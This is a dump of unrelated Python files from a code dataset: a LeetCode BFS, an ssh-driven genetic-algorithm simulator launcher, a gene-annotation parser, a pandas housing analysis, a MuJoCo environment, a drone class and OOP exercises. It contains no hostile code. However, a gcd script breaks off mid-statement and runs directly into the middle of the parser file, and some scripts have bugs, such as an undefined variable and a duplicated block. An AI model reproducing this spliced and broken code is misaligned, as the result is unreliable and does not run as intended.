collections import deque\n def getNextOptions(s):\n s_neighbors = []\n for i in range(len(s)):\n oneUp, oneDown = list(s), list(s)\n oneUp[i] = str((int(s[i])+1)%10)\n oneDown[i] = str((int(s[i])-1)%10)\n s_neighbors.append(''.join(oneUp))\n s_neighbors.append(''.join(oneDown))\n return s_neighbors\n \n res = 0 \n q = deque()\n visited = set()\n q.append('0000')\n \n while len(q) > 0:\n queue_size = len(q)\n for i in range(queue_size):\n cur = q.popleft()\n if cur in deadends:\n continue\n elif cur == target:\n return res\n else:\n cur_neighbors = getNextOptions(cur)\n # print(cur, ':', cur_neighbors)\n for cn in cur_neighbors:\n if cn not in visited: # wrong: cn not in deadends and ...\n q.append(cn)\n visited.add(cn)\n res += 1\n return -1","sub_path":"Medium/LC752.py","file_name":"LC752.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"157452600","text":"\nimport os, sys\nimport subprocess\nimport shlex\n\nimport numpy as np\nimport json\nimport time\n\nimport os.path\n\n# mlist = [''.join(['00', str(x+1)])[-2:] for x in range(8)]\n# l-3d22- ['01','02','03','04','05','06','07','09','11','12','13','14','15','16','18','19']\n# mlist = ['01','02','03','04','05','06','07','08']\nmlist = ['{:0>2d}'.format(x + 1) for x in range(25)] \nplist = {x:None for x in mlist}\nmutstep = 1 # the mutation step\ngnum = 20\ntopps = 6\ncov_limit = 2\n\nevaltime = len(mlist)\n\ndef addproc(gain1, gain2, gain3, gain4, gain5, ra, tmr, eid):\n mid = [d for d in plist.keys() if plist[d] == None]\n if not mid:\n return None\n cmd_line = 'ssh -p 222 -o ConnectTimeout=5 gpan@l-' + \\\n mid[0] + ' \\'bash -ic \"date; cd simulator.dnn; python test.py m' + \\\n mid[0] + ' ' + str(gain1) + ' ' + str(gain2) + ' ' +str(gain3) + ' ' + \\\n str(gain4) + ' ' + str(gain5) + ' ' + str(ra) + ' ' + str(tmr) + ' ' + str(eid) + \\\n ' 2>error' + str(mid[0]) + '.txt; date;\" \\''\n #print(cmd_line)\n proc = subprocess.Popen(\n shlex.split(cmd_line),\n stdin = subprocess.PIPE,\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE,\n close_fds = True)\n plist[mid[0]] = proc\n return proc\n\ndef retproc():\n for d in plist.keys():\n if plist[d] == None or plist[d].poll() == None:\n continue\n output = plist[d].stdout.read().split('\\n')\n plist[d] = None\n return output\n return None\n\ndef ispsok(new_ps):\n blist = [5,5,5,5,5,5,1,1]\n ulist = [50,50,50,50,50,30,10,20]\n for i in range(len(new_ps)):\n if new_ps[i] < blist[i] or new_ps[i] > ulist[i]:\n return False\n return True\n\ndef crossover(p1, p2, ppool):\n count = 0\n size = len(p1)\n while count < 2**size * 3:\n pid = np.random.randint(2, size = (size,))\n mutval = np.random.randint(mutstep * 2 + 1, size = (size,)) - mutstep\n # mutval[-1] = 0\n new_ps = [[p1[i], p2[i]][pid[i]] + mutval[i] for i in range(size)]\n # mask gain3 gain4 gain5\n # new_ps[2] = 10\n # new_ps[3] = 10\n new_ps[4] = 10\n # end of mask gain4 gain5\n epoch_rand = np.random.randint(20, size = (1,)) + 1\n new_ps[-1] = epoch_rand[0]\n if ispsok(new_ps) and not tuple(new_ps) in ppool.keys():\n return tuple(new_ps)\n count += 1\n return None\n\ndef gettop(ppool, num, cov_time = None):\n sorted_pool = sorted(ppool.items(), key=lambda kv:sum(kv[1])/len(kv[1]))\n # print([(x,sum(y)/len(y)) for x, y in sorted_pool[:num]])\n if cov_time == None:\n return [x for x, y in sorted_pool[:num]]\n return [x for x, y in sorted_pool if cov_time[x] < cov_limit][:num]\n\ndef evalppl(pps, ppool, num):\n for a,b,c,d,e,f,g,h in [x for i in range(num) for x in pps ]:\n proc = addproc(a,b,c,d,e,f,g,h)\n while proc == None:\n output = retproc()\n if output == None:\n time.sleep(1)\n continue\n # print(output)\n if len(output) < 3:\n print('error', output)\n else:\n res = output[2].split(':')\n tname = tuple([int(x) for x in res[1:9]]) # int(res[1]), int(res[2]), int(res[3])])\n if tname in ppool.keys():\n ppool[tname].append(float(res[9]))\n else:\n ppool[tname] = [float(res[9])]\n proc = addproc(a,b,c,d,e,f,g,h)\n\n while [d for d in plist.keys() if not plist[d] == None] :\n output = retproc()\n if output == None:\n time.sleep(1)\n else:\n # print(output)\n if len(output) < 3:\n print('error', output)\n continue\n res = output[2].split(':')\n tname = tuple([int(x) for x in res[1:9]])\n if tname in ppool.keys():\n ppool[tname].append(float(res[9]))\n else:\n ppool[tname] = [float(res[9])]\n \n\n# RA=10e-12 #ranges from 5e-12 to 20e-12 with \"5e-12\" steps \n# TMR=100\t #ranges from 100 to 400 with \"50\" steps\n# gain1=10 #ranges from 5 to 50 with \"1\" steps\n# gain2=10 #ranges from 5 to 50 with \"1\" steps\n# gain3=10 #ranges from 5 to 50 with \"1\" steps\n# gain4=10 #ranges from 5 to 50 with \"1\" steps\n# gain5=10 #ranges from 5 to 50 with \"1\" steps\ndef run_simulator():\n print('ST:', time.ctime())\n rec_json = {}\n cov_time = {}\n\n # initial population [(5,5,5),(25,25,25),(35,35,35),(50,50,50)]\n if os.path.isfile('result.json'):\n with open('result.json', 'r') as dfile:\n rec_json = json.load(dfile)\n stgen, stpool = sorted(data.items(), key = lambda kv:int(kv[0]))[-1]\n stgen = int(stgen) + 1\n ppool = {tuple(x):y for [x,y] in stpool[1]}\n cov_time = {tuple(x):0 for [x,y] in stpool[1]}\n else:\n stgen = 0\n ppl = [(5,5,5,10,10,5,2,9),(15,15,15,10,10,10,4,4),\n (25,25,25,10,10,15,6,17),(30,30,30,10,10,20,4,8),\n (35,35,35,10,10,25,8,12),(40,40,40,10,10,30,8,15)] # initial population\n ppool = {}\n print('generation 0', time.ctime())\n [ evalppl([x], ppool, evaltime) for x in ppl ]\n for x in ppl:\n cov_time[x] = 0\n print(ppl)\n rec_json[stgen] = [ppl, sorted(ppool.items(), key=lambda kv:kv[1])]\n with open('result.json', 'w') as res_file:\n json.dump(rec_json, res_file)\n with open('cov_time.json', 'w') as ct_file:\n json.dump(cov_time.items(), ct_file)\n stgen += 1\n\n for i in range(gnum): \n ppl = gettop(ppool, topps, cov_time)\n print('top ppl to do cross over')\n \n for x in ppl:\n cov_time[x] += 1\n print(x, cov_time[x])\n new_ppl = list(set([crossover(x,y, ppool) for x in ppl for y in ppl if ppl.index(x) < ppl.index(y)]))\n print('generation {}'.format(i+1), time.ctime())\n # evalppl([x for x in new_ppl if not x== None], ppool, 16)\n [ evalppl([x], ppool, evaltime) for x in new_ppl if not x == None ]\n for x in new_ppl:\n if not x == None:\n cov_time[x] = 0\n print(sorted([(x, '{:.4f}'.format(sum(ppool[x])/len(ppool[x]))) for x in new_ppl if not x == None], key = lambda kv:kv[1]))\n # top_new = gettop({x:ppool[x] for x in new_ppl if not x == None}, 5)\n # evalppl([x for x in top_new if not x == None], ppool, 16) \n # print(sorted([(x, sum(ppool[x])/len(ppool[x])) for x in top_new if not x == None], key = lambda kv:kv[1])) \n rec_json[stgen] = [new_ppl, sorted(ppool.items(), key=lambda kv:kv[1])]\n with open('result.json', 'w') as res_file:\n json.dump(rec_json, res_file)\n with open('cov_time.json', 'w') as ct_file:\n json.dump(cov_time.items(), ct_file)\n stgen += 1\n \n gettop(ppool, topps)\n\n # with open('result.json', 'w') as res_file:\n # json.dump(rec_json, res_file)\n \n print('EN:', time.ctime())\n\ndef run_evaluation(params): # params (5,5,5,10,10,10,2)\n print('ST:', time.ctime())\n ppl = [params] \n result = {}\n evalppl(ppl, result, evaltime)\n # print(result)\n for k,v in result.items():\n print(k, sum(v)/len(v))\n # print(result)\n print('EN:', time.ctime())\n\nif __name__ == \"__main__\":\n run_simulator()\n # for params in [(9, 18, 10, 10, 10, 9, 9, 9) ,\n # (10, 34, 10, 10, 10, 9, 9, 11) ,\n # (9, 18, 10, 10, 10, 23, 6, 9) ,\n # (10, 18, 10, 10, 10, 23, 5, 11) ]:\n # params = (10,10,10,10,10,10,2,i)\n # run_evaluation(params)\n \n","sub_path":"run_simulator.py","file_name":"run_simulator.py","file_ext":"py","file_size_in_byte":7023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"304315887","text":"def gcd(a,b):\n if a==0:\n return b\n elif b==0:\n return a\n else:\n if a>b:\n return gcd(a%b,b)\n else:\n return gcd(a,b%a)\ndef judge(rr):\n for i in range(len(rr)-1):\n for j in range(i+1,len(rr)):\n if gcd(rr[i],rr[j])*gcd(rr[i]+1,rr[j]+1)==1:\n return False\n return True\nn=int(input())\nr=[]\nfor i in range(n):\n r.append(int(input()))\nr.sort()\ncount=0\nprint(gcd(16,6))\nif len(r)==1:\n count=1\nelse:\n for ii in range(len(r)-1):\n for jj in range(ii+1,len(r)):\n rr=r[ii:jj+1]\n if judge(rr):\n if count\")\n elif(line.startswith(\"gene\")):\n lineArr = line.split(\"\\t\")\n first = int(lineArr[1])\n second = int(lineArr[2])\n score = float(lineArr[6])\n sign = lineArr[3]\n length = second - first + 1\n length = int(length)\n if (score > self.cutoff_score and length >= int(self.cutoff_length)):\n if(sign == \"-\"):\n fMgaOutput.write(readName + \"_\" + str(second) + \"_\" + str(first) + \" Tool=MetaGeneAnnotator \" + \"\\n\")\n else:\n fMgaOutput.write(readName + \"_\" + str(first) + \"_\" + str(second) + \" Tool=MetaGeneAnnotator \" + \"\\n\")\n else:\n pass\n \n fMgaOutput.close()\n\ndef main():\n parser = argparse.ArgumentParser(description = \"User Manual \\n -i = input_file \\n This script requires 1 input files \\n 1. Orginal MGA file \\n 2. Cutoff Score \\n 3. Cutoff length \\n\", formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-i\" , dest = \"filename\", help = \"Input_file\" , metavar = \"file\" , nargs =3 , required = True)\n parser.add_argument(\"-o\", dest = \"output_directory\", help = \"output_directory\" , metavar = \"path\" )\n\n args = parser.parse_args()\n mga_original_file = args.filename[0]\n cutoff_score = args.filename[1]\n cutoff_length = args.filename[2]\n mga = mga_parser_with_len(mga_original_file, cutoff_score, cutoff_length)\n mga.parse_original_mga_file()\n \nif __name__ == '__main__':\n main()\n","sub_path":"Scripts for analysis of results/mga_parser_with_score_len_cutoff.py","file_name":"mga_parser_with_score_len_cutoff.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"89054205","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\n# https://segmentfault.com/a/1190000015440560\n\nimport os\nimport sys\n\n# 科学计算包numpy,pandas,\n# 可视化matplotlib,seaborn,\n# 以及机器学习包sklearn\n\n\nimport pandas as pd\nfrom pandas import DataFrame\nimport numpy as np\nimport seaborn as sns\nimport matplotlib as mpl\nfrom IPython.display import display\nimport matplotlib.pyplot as plt\n\nplt.style.use(\"fivethirtyeight\")\nsns.set_style({'font.sans-serif':['simhei','Arial']})\n\n'''\n解决中文方块问题\n'''\n## ---- 解决中文方块问题\n\nplt.rcParams['font.family'] = ['Arial Unicode MS'] #解决中文显示方块问题\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 中文字体设置-黑体\nplt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题\n\n## ------\n\n# 检查Python版本\nfrom sys import version_info\nif version_info.major != 3:\n raise Exception('请使用Python 3 来完成此项目')\n\n\n# 导入二手房数据\nlianjia_df = pd.read_csv('lianjia.csv')\ndisplay(lianjia_df.head(n=2))\n\n# 检查缺失值情况\n#lianjia_df.info()\n\n# 数据描述\n# print(lianjia_df.describe())\n\n\n# 添加新特征房屋均价\ndf = lianjia_df.copy()\ndf['PerPrice'] = lianjia_df['Price']/lianjia_df['Size']\n\n# 重新摆放列位置\ncolumns = ['Region', 'District', 'Garden', 'Layout', 'Floor', 'Year', 'Size', 'Elevator', 'Direction', 'Renovation', 'PerPrice', 'Price']\ndf = pd.DataFrame(df, columns = columns)\n\n# 重新审视数据集\ndisplay(df.head(n=2))\n\n\n\n\"\"\"\n特征工程\n\"\"\"\n# 移除结构类型异常值和房屋大小异常值\ndf = df[(df['Layout']!='叠拼别墅')&(df['Size']<1000)]\n\n# 去掉错误数据“南北”,因为爬虫过程中一些信息位置为空,导致“Direction”的特征出现在这里,需要清除或替换\ndf['Renovation'] = df.loc[(df['Renovation'] != '南北'), 'Renovation']\n\n# 由于存在个别类型错误,如简装和精装,特征值错位,故需要移除\ndf['Elevator'] = df.loc[(df['Elevator'] == '有电梯')|(df['Elevator'] == '无电梯'), 'Elevator']\n\n# 填补Elevator缺失值\ndf.loc[(df['Floor']>6)&(df['Elevator'].isnull()), 'Elevator'] = '有电梯'\ndf.loc[(df['Floor']<=6)&(df['Elevator'].isnull()), 'Elevator'] = '无电梯'\n\n\n# print(df['Layout'].value_counts())\n\n# 只考虑“室”和“厅”,将其它少数“房间”和“卫”移除\n# df = df.loc[df['Layout'].str.extract('^\\d(.*?)\\d.*?') == '室']\n\n# print(df['Layout'].value_counts())\n\n# 提取“室”和“厅”创建新特征\ndf['Layout_room_num'] = df['Layout'].str.extract('(^\\d).*', expand=False).astype('int64')\ndf['Layout_hall_num'] = df['Layout'].str.extract('^\\d.*?(\\d).*', expand=False).astype('int64')\n\n# print(df['Layout_room_num'].value_counts())\n# print(df['Layout_hall_num'].value_counts())\n\n# 按中位数对“Year”特征进行分箱\ndf['Year'] = pd.qcut(df['Year'],8).astype('object')\n\nprint(df['Year'].value_counts())\n\n# 对“Direction”特征\nd_list_one = ['东','西','南','北']\nd_list_two = ['东西','东南','东北','西南','西北','南北']\nd_list_three = ['东西南','东西北','东南北','西南北']\nd_list_four = ['东西南北']\n# df['Direction'] = df['Direction'].apply(direct_func)\n# df = df.loc[(df['Direction']!='no')&(df['Direction']!='nan')]\n\n# 根据已有特征创建新特征\ndf['Layout_total_num'] = df['Layout_room_num'] + df['Layout_hall_num']\ndf['Size_room_ratio'] = df['Size']/df['Layout_total_num']\n\n# 删除无用特征\ndf = df.drop(['Layout','PerPrice','Garden'],axis=1)\n\n# 对于object特征进行onehot编码\n# df,df_cat = one_hot_encoder(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"analysis/lianjia/lianjia02.py","file_name":"lianjia02.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"417384586","text":"import numpy as np\nfrom bayesiancoresets import gigasearch as gs\n\n####\n###This test is no longer used (tree-based search is not used in the main code)\n####\n\nnp.random.seed(1)\n\nn_trials = 50\ntol = 1e-9\ntests = [(N, D, dist) for N in [10, 100] for D in [3, 10] for dist in ['gauss', 'bin', 'gauss_colinear', 'bin_colinear', 'axis_aligned']]\n\n\ndef gendata(N, D, dist=\"gauss\"):\n if dist == \"gauss\":\n x = np.random.normal(0., 1., (N, D))\n elif dist == \"bin\":\n x = np.zeros((N, D))\n nz = (x**2).sum(axis=1) == 0.\n while nz.sum() > 0:\n x[nz, :] = (np.random.rand(nz.sum(), D) > 0.5).astype(float)\n nz = (x**2).sum(axis=1) == 0.\n elif dist == \"gauss_colinear\":\n x = np.random.normal(0., 1., D)\n y = np.random.rand(N)*2.-1.\n x = y[:, np.newaxis]*x\n elif dist == \"bin_colinear\":\n x = (np.random.rand(D) > 0.5).astype(float)\n while (x**2).sum() == 0:\n x = (np.random.rand(D) > 0.5).astype(float)\n y = np.random.rand(N)*2.-1.\n x = y[:, np.newaxis]*x\n else:\n x = np.zeros((N, N))\n for i in range(N):\n x[i, i] = 1./float(N)\n return x/np.sqrt((x**2).sum(axis=1))[:, np.newaxis]\n\n\ndef gigasearch_single(N, D, dist=\"gauss\"):\n x = gendata(N, D, dist)\n srch = gs.GIGASearch(x)\n for m in range(n_trials):\n yw = np.random.normal(0., 1., x.shape[1])\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., x.shape[1])\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n n_ot = srch.search(yw, y_yw)\n f_ot = x[n_ot, :].dot(y_yw)/np.sqrt(1.-x[n_ot, :].dot(yw)**2)\n n_ol = (x.dot(y_yw)/np.sqrt(1.-x.dot(yw)**2)).argmax()\n f_ol = x[n_ol, :].dot(y_yw)/np.sqrt(1.-x[n_ol, :].dot(yw)**2)\n assert f_ol - f_ot < tol, \"gigasearch failed; true obj = \" + str(f_ol) + \" gigasearch obj = \" + str(f_ot)\n \ndef test_gigasearch():\n for N, D, dist in tests:\n for n in range(n_trials):\n yield gigasearch_single, N, D, dist\n\n\ndef test_gigasearch_stability():\n X = np.random.rand(10, 5)\n\n #test stability with immediate garbage collection\n for i in range(100):\n gs.GIGASearch(X)\n \n #test stability with cancellation\n for i in range(100):\n tr = gs.GIGASearch(X)\n tr.cancel_build()\n \n #test stability with search then cancellation\n for i in range(100):\n yw = np.random.normal(0., 1., 5)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., 5)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n tr = gs.GIGASearch(X)\n tr.search(yw, y_yw)\n tr.cancel_build()\n \n #test stability with cancellation then search\n for i in range(100):\n yw = np.random.normal(0., 1., 5)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., 5)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n tr = gs.GIGASearch(X)\n tr.cancel_build()\n tr.search(yw, y_yw)\n \n #test stability with lots of searches\n tr = gs.GIGASearch(X)\n for i in range(100):\n yw = np.random.normal(0., 1., 5)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., 5)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n tr.search(yw, y_yw)\n\nif __name__ == '__main__':\n import time\n import sys\n import ctypes\n import pkgutil\n import os\n N = 10000000\n D = 20\n x = gendata(N, D, 'gauss')\n\n hcfn = pkgutil.get_loader('hilbertcoresets').filename\n libgs = ctypes.cdll.LoadLibrary(os.path.join(hcfn, 'libgigasearch.so'))\n libgs.search.argtypes = [ctypes.POINTER(ctypes.c_double), ctypes.POINTER(ctypes.c_double), ctypes.POINTER(ctypes.c_double), ctypes.c_uint, ctypes.c_uint]\n libgs.search.restype = ctypes.c_int\n for i in range(1000):\n yw = np.random.normal(0., 1., D)\n yw /= np.sqrt((yw**2).sum())\n y_yw = np.random.normal(0., 1., D)\n y_yw -= y_yw.dot(yw)*yw\n y_yw /= np.sqrt((y_yw**2).sum())\n t0 = time.time()\n num = (x*y_yw).sum(axis=1)\n denom = (x*yw).sum(axis=1)\n denom = np.sqrt(1.-denom**2)\n n_ol = (num/denom).argmax()\n lin_time = time.time()-t0\n lin_n = N\n t0 = time.time() \n n_og = libgs.search(x.ctypes.data_as(ctypes.POINTER(ctypes.c_double)), yw.ctypes.data_as(ctypes.POINTER(ctypes.c_double)), y_yw.ctypes.data_as(ctypes.POINTER(ctypes.c_double)), x.shape[0], x.shape[1])\n #n_og = giga.search(yw, y_yw)\n gs_time = time.time()-t0\n gs_n = N\n sys.stderr.write(' gs_t: ' + str(gs_time) + ' lin_t: ' + str(lin_time) + ' gs_n: ' + str(n_og) + ' lin_n: ' + str(n_ol) + ' gs_n: ' + str(gs_n) + ' lin_n: ' + str(lin_n)+ '\\n')\n sys.stderr.flush()\n \n \n \n\n\n\n\n\n","sub_path":"tests/old_tst_gigasearch.py","file_name":"old_tst_gigasearch.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203677903","text":"import MapReduce\nimport sys\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\n# final matrix size\nn = 5\nm = 5\n\ndef mapper(record):\n # key: matrix id\n # i: row\n # j: column\n # value: value\n key, i, j, value = record\n\n if (key == \"a\"):\n for k in range(m):\n mr.emit_intermediate((i, k), record)\n if (key == \"b\"):\n for k in range(n):\n mr.emit_intermediate((k, j), record)\n\ndef reducer(key, list_of_values):\n # key: (i,j)\n # value: list of records\n total = 0\n for record in list_of_values:\n # matrix: matrix\n # i: row\n # j: column\n # val: value\n matrix = record[0]\n i = record[1]\n j = record[2]\n val = record[3]\n if matrix == 'a':\n b_cell = [r for r in list_of_values if (r[0] == 'b' and r[1] == j)]\n if b_cell != []:\n total += val * b_cell[0][3]\n\n if total != 0:\n mr.emit((key[0], key[1], total))\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"assignment3/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"98531062","text":"import numpy as np\nfrom gym import utils\nfrom gym.envs.mujoco import mujoco_env\n\nclass Arm3dDoorEnv(mujoco_env.MujocoEnv, utils.EzPickle):\n def __init__(self):\n self.target_doorpos = np.asarray([-0.08406698, -0.10218753, 0.3])\n self.target_handlepos = np.asarray([-0.01953642, -0.41961081, -0.25])\n utils.EzPickle.__init__(self)\n mujoco_env.MujocoEnv.__init__(self, 'pr2_arm3d_door.xml', 2)\n\n def viewer_setup(self):\n self.viewer.cam.trackbodyid = 0\n self.viewer.cam.distance = self.model.stat.extent * 2.0\n #self.viewer.cam.lookat[2] += .8\n self.viewer.cam.elevation = 0.\n\n def reset_model(self):\n qpos = self.np_random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos\n qvel = self.init_qvel\n self.set_state(qpos, qvel)\n return self._get_obs()\n\n def _step(self, a):\n vec1 = self.get_body_com(\"r_gripper_l_finger_tip_link\")-self.get_body_com(\"door_handle\")\n vec2 = self.get_body_com(\"door_handle\")-self.target_handlepos\n reward_dist = - np.linalg.norm(vec1+vec2)\n reward_ctrl = - np.square(a).sum()\n reward = reward_dist + reward_ctrl\n self.do_simulation(a, self.frame_skip)\n ob = self._get_obs()\n done = False\n return ob, reward, done, dict(reward_dist=reward_dist, reward_ctrl=reward_ctrl)\n\n def _get_obs(self):\n theta = self.model.data.qpos.flat[:6]\n return np.concatenate([\n np.cos(theta),\n np.sin(theta),\n self.model.data.qpos.flat[6:],\n self.model.data.qvel.flat[:6],\n self.get_body_com(\"r_gripper_l_finger_tip_link\")-self.get_body_com(\"door_handle\"),\n self.get_body_com(\"door_handle\")-self.target_handlepos\n\n ])\n\n'''\n#0.16134199 -0.37169818 0.25\n\n#-0.01953642 -0.41961081 door handle pos\n# -0.08406698 -0.10218753 door pos\nif __name__ == \"__main__\":\n env = Arm3dDoor()\n print (env.model.data.qpos.flat[:].shape)\n print (env.action_space)\n \"\"\"\n import time\n env = Arm3dDoor()\n env.reset()\n\n print (env.action_space)\n episode_i = 0\n \"\"\"\n\n while True:\n env.reset()\n env.render()\n \"\"\"\n print (\"episode {}\".format(episode_i))\n print ('orig')\n print (env.get_body_com(\"door_handle\"))\n print (env.get_body_com(\"door\"))\n\n for _ in range(150):\n env.render()\n #action = np.random.uniform(low=-2,high=2,size=env.action_space.shape)\n action = np.zeros(env.action_space.shape)\n #action[-1] = 0.\n #action[-1] = 0\n env.step(action)\n print ('end')\n print (env.get_body_com(\"door_handle\"))\n print (env.get_body_com(\"door\"))\n\n episode_i += 1\n time.sleep(1)\n \"\"\"\n'''\n","sub_path":"gym/envs/mujoco/arm3d_door.py","file_name":"arm3d_door.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"232631478","text":"import math\n\n#Drone class\n#Needs the env object passed into on initialization for environment reference\nclass Drone:\n def __init__(self, env, pos):\n self.env = env\n\n if (pos != None):\n self.pos = [pos[0], pos[1]]\n else:\n self.pos = [0, 0]\n\n self.time = 0\n\n self.hopper = []\n self.hopperSize = (int)(math.floor(pow(pow(self.env.getSize(), 3), 0.5)/2))\n self.lastColour = \"\"\n\n self.memory = []\n #Initializing drone's memory of environment to zero\n for i in range(self.env.getSize()):\n toAddi = []\n for j in range(self.env.getSize()):\n toAddj = []\n for k in range(self.env.getSize()):\n toAddj.append(None)\n toAddi.append(toAddj)\n self.memory.append(toAddi)\n\n #Moves the drone in a given direction, updates the time taken\n def move(self, direction): #0 is up, 1 is right, 2 is down, 3 is left\n if (direction == 0):\n if self.pos[1] >= self.env.s - 1:\n return None\n self.pos[1] += 1\n elif (direction == 1):\n if self.pos[0] >= self.env.s - 1:\n return None\n self.pos[0] += 1\n elif (direction == 2):\n if self.pos[1] <= 0:\n return None\n self.pos[1] += -1\n elif (direction == 3):\n if self.pos[0] <= 0:\n return None\n self.pos[0] += -1\n else:\n print(\"invalid direction\")\n self.time += 1\n self.scan()\n return True\n def moveTo(self, target):\n xDiff = target[0] - self.pos[0]\n yDiff = target[1] - self.pos[1]\n for i in range(abs(xDiff)):\n if (xDiff < 0):\n self.move(3)\n else:\n self.move(1)\n for i in range(abs(yDiff)):\n if (yDiff < 0):\n self.move(2)\n else:\n self.move(0)\n\n #Picks up a block in the environment at the current position, updates time\n def pickUp(self):\n if (len(self.hopper) < self.hopperSize): #if there is room in the hopper, pick up block\n toAdd = self.env.takeBlock(self.pos[0], self.pos[1]) # (colour, z)\n if (toAdd == None): # if there is an error exit\n return None\n\n self.hopper.append(toAdd) #add to hopper\n\n #Update time\n newColour = toAdd\n if (newColour == self.lastColour):\n self.time += 2\n else:\n self.time += 3\n\n self.lastColour = newColour\n temp = self.scan()\n self.memory[self.pos[0]][self.pos[1]][temp[1]] = None\n self.scan()\n return True\n\n #Drops off a block in the environment at the current position at a given z value\n def dropOff(self, colour, z):\n toRemove = None\n inHopper = False\n for i in self.hopper: #block needs to be in hopper to drop off\n if (i == colour):\n toRemove = i\n inHopper = True\n break\n if (inHopper == False): #If the block is not in the hopper\n return None\n self.hopper.remove(toRemove) #Remove block from hopper\n\n newZ = z\n if (z == -1):\n newZ = self.env.blockAt(self.pos[0], self.pos[1])[1] + 1\n if (newZ >= self.env.getSize()):\n return True\n #Add block to grid and memory\n test = self.env.addBlock(self.pos[0], self.pos[1], (toRemove, newZ))\n newZ = self.env.blockAt(self.pos[0], self.pos[1])[1] + 1\n if (newZ >= self.env.getSize()):\n return 10\n\n #Add block to env and memory\n test = self.env.addBlock(self.pos[0], self.pos[1], (toRemove, newZ))\n\n if (test == None):\n print(\"add block failed\")\n return None\n\n #Update time\n if (colour == self.lastColour):\n self.time += 2\n else:\n self.time += 3\n\n self.lastColour = colour\n self.memory[self.pos[0]][self.pos[1]][newZ] = toRemove[0]\n self.scan()\n return True\n \n #Scans the block below the drone\n def scan(self):\n block = self.env.blockAt(self.pos[0], self.pos[1])\n if block is not None:\n self.memory[self.pos[0]][self.pos[1]][block[1]] = block[0]\n return block\n\n def isHopperFull(self):\n return len(self.hopper) >= self.hopperSize\n\n def getHopperColours(self):\n out = []\n for i in self.hopper:\n if (i not in out):\n out.append(i)\n return out\n","sub_path":"drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"641401812","text":"# Testing Methods and Attributes\r\n# class Fruit:\r\n# food_type = \"Fruit\"\r\n\r\n# def __init__(self, flavor, grows_on, color, name):\r\n# self.flavor = flavor\r\n# self.grows_on = grows_on\r\n# self.color = color\r\n# # adding one more attribute\r\n# self.name = name\r\n\r\n# def ripen(self):\r\n# print(f\"The {self.name} ripens, becoming a vibrant {self.color}, and has a delicious {self.flavor} flavor. You may now pick it from the {self.grows_on}\")\r\n\r\n# my_fruit = Fruit(\"sweet\", \"tree\", \"red\", \"cherry\")\r\n# your_fruit = Fruit(\"sweet\", \"tree\", \"yellow\", \"banana\")\r\n\r\n# my_fruit.ripen()\r\n# your_fruit.ripen()\r\n\r\n# Testing class and static methods\r\nclass Fruit:\r\n food_type = \"Fruit\"\r\n all_fruits = []\r\n\r\n def __init__(self, flavor, grows_on, color, name):\r\n self.flavor = flavor\r\n self.grows_on = grows_on\r\n self.color = color\r\n self.name = name\r\n Fruit.all_fruits.append(self)\r\n\r\n def ripen(self):\r\n print(f\"The {self.name} ripens, becoming a vibrant {self.color}, and has a delicious {self.flavor} flavor. You may now pick it from the {self.grows_on}\")\r\n\r\n @classmethod\r\n def get_all_fruits(cls):\r\n for fruit in cls.all_fruits:\r\n print(fruit.name)\r\n # print(f\"This was called from {cls.name}\") <- this will not work since this is a class method, not an instance method\r\n\r\n @staticmethod\r\n # but unlike the class method, it doesn't get any arguments referring to the class or object itself\r\n def remove_fruit(name, list_of_fruit):\r\n for i in range(len(list_of_fruit)):\r\n if list_of_fruit[i].name == name:\r\n list_of_fruit.pop(i)\r\n\r\n\r\nmy_fruit = Fruit(\"sweet\", \"bush\", \"red\", \"strawberry\")\r\nyour_fruit = Fruit(\"sweet\", \"tree\", \"yellow\", \"banana\")\r\nmy_fruit.ripen()\r\nmy_fruit.get_all_fruits()\r\n\r\n\r\nFruit.remove_fruit(\"banana\", Fruit.all_fruits)\r\n\r\nFruit.get_all_fruits()\r\n","sub_path":"2.Python/00.letcures/02.Object_Oriented_Programming/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"519038700","text":"from exceptions import BaseException\n\nclass FileDoesNotExistError(BaseException):\n file_path = None\n message = 'the file \"{file_path}\" does not 